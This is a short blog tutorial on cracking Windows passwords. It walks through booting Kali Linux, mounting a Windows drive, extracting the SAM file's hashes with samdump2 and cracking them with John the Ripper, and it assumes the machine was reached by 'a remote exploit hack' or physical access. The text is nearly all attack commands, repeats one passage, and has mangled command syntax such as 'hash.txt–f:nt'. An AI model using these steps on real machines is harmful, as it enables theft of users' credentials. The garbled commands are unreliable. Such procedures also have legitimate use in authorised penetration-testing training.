We will use John
the Ripper (John) to crack a Windows Security Access Manager (SAM) file.
The SAM file stores the usernames and password hashes of users of the
Windows system. In this tutorial,We are assuming that you have accessed the Windows machine via either a remote exploit hack or you have
physical access to the computer and are using Kali Linux on a USB or DVD-ROM drive.
Steps:-
-----------
physical access to the computer and are using Kali Linux on a USB or DVD-ROM drive.
Steps:-
-----------
- Check the hard drive you wish to mount:
type:- Fdisk –l
- Now mount hard drive and set target as its mount point:
type:- mount /dev/sda1 /target/ - Change directories to the Windows SAM file:
type:- cd /target/windows/system32/config - List contents of the directory:
type:- ls –al - Use SamDump2 to extract the hash and place the file in your root directory in a
folder 'hashes':
type:- samdump2 system SAM > /root/hashes/hash.txt - Change the directory:
type:- cd /pentest/passwords/jtr - Run John the Ripper:
type:- ./john /root/hashes/hash.txt
./john /root/hashes/hash.txt–f:nt (If attacking a file on a NTFS System)
0 comments:
Post a Comment